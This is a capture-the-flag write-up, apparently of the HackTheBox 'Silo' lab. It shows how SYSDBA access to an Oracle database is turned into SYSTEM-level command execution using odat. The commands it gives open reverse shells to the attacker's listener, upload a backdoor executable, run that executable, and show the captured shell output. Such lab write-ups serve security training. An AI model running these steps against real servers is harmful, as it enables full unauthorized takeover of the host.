InfoSec LAB

Silo_System

Created: 4 min read

System

Having a SYSDBA credential to a Oracle Database gives an unique opportunity to do many things.

Among them, lies system command execution.

There will be 2 approaches

Direct Reverse Shell

I can get a reverse shell spawning via one of the modules available in odat

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat dbmsscheduler --help
[...[
--reverse-shell ip port          get a reverse shell. Use Python on Linux targets.
                                   On Windows, uses Powershell (download a script file and executes it remotely)

The dbmsscheduler module in odat has the --reverse-shell flag with a builtin script to host a reverse shell locally and have the target download and execute over HTTP

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat dbmsscheduler -s $IP -U scott -P tiger -d XE --sysdba --reverse-shell 10.10.14.5 9999
 
[1] (10.10.10.82:1521): Try to give you a reverse shell from the 10.10.10.82 server
Give me the local port for the temporary http file server {e.g. 8080): 8080
10.10.10.82 - - [17/Jan/2023 20:45:12] "GET /URCLXGGFUI HTTP/1.1" 200 -
[+] The Job is finish
nc: invalid option -- '4'
nc -h for help
[+] The Job is running
[+] The Job is finish

Executing the dbmsscheduler module with the --reverse-shell flag Notice the --sysdba flag. It must be supplied in order to get the System-level command execution

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49168
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> whoami
 
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> mkdir C:\tmp
 
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> cd ..
 
C:\oraclexe\app\oracle\product\11.2.0\server> cd C:\tmp
 
C:\tmp> cd C:\Users\Administrator
 
C:\Users\Administrator> dir
  Volume in drive C has no label.
 Volume Serial Number is 69B2-6341
 
 Directory of C:\Users\Administrator
 
01/01/2018  12:49 AM    <DIR>          .
01/01/2018  12:49 AM    <DIR>          ..
01/06/2018  09:13 PM    <DIR>          Contacts
01/07/2018  01:34 PM    <DIR>          Desktop
01/06/2018  09:13 PM    <DIR>          Documents
01/07/2018  09:35 PM    <DIR>          Downloads
01/06/2018  09:13 PM    <DIR>          Favorites
01/06/2018  09:13 PM    <DIR>          Links
01/06/2018  09:13 PM    <DIR>          Music
01/01/2018  12:11 AM    <DIR>          Oracle
01/06/2018  09:13 PM    <DIR>          Pictures
01/06/2018  09:13 PM    <DIR>          Saved Games
01/06/2018  09:13 PM    <DIR>          Searches
01/06/2018  09:13 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   7,403,036,672 bytes free

The shell is a bit funky as I can only use really basic commands but I am indeed nt authority\system as I can access the home directory of administrator

System Level Compromise

Shell Upload

Since the --reverse-shell flag is a bit un-reliable, I will supply my own reverse shell

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat utlfile -s $ip -u scott -p tiger -d xe --sysdba --putfile 'c:\' backdoor.exe /home/kali/archive/htb/labs/silo/backdoor.exe
 
[1] (10.10.10.82:1521): Put the /home/kali/archive/htb/labs/silo/backdoor.exe local file in the C:\ folder like backdoor.exe on the 10.10.10.82 server
[+] the /home/kali/archive/htb/labs/silo/backdoor.exe file was created on the c:\ directory on the 10.10.10.82 server like the backdoor.exe file

I can use the odat’s utlfile module to upload the reverse shell remotely

  • notice the quotes around the path 'c:\' to not have Windows confused
  • Absolute path is required to point to the local file
  • --sysdba flag needs to be supplied. Just like before
┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat externaltable -s $ip -u scott -p tiger -d xe --sysdba --exec 'c:\' backdoor.exe
 
[1] (10.10.10.82:1521): Execute the backdoor.exe command stored in the C:path
[+] the backdoor.exe command stored in c:has been executed (normally)

I can then use the odat’s externaltable module to execute the uploaded file --sysdba flag needs to be supplied. Same here.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49175
Windows PowerShell running as user SILO$ on SILO
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> whoami
nt authority\system
ps c:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> hostname
SILO
ps c:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.82
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{50cd6e47-e5c7-44a8-b294-ba01e18b9e30}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Connection received

System Level Compromise

Interactive Graph View

Backlinks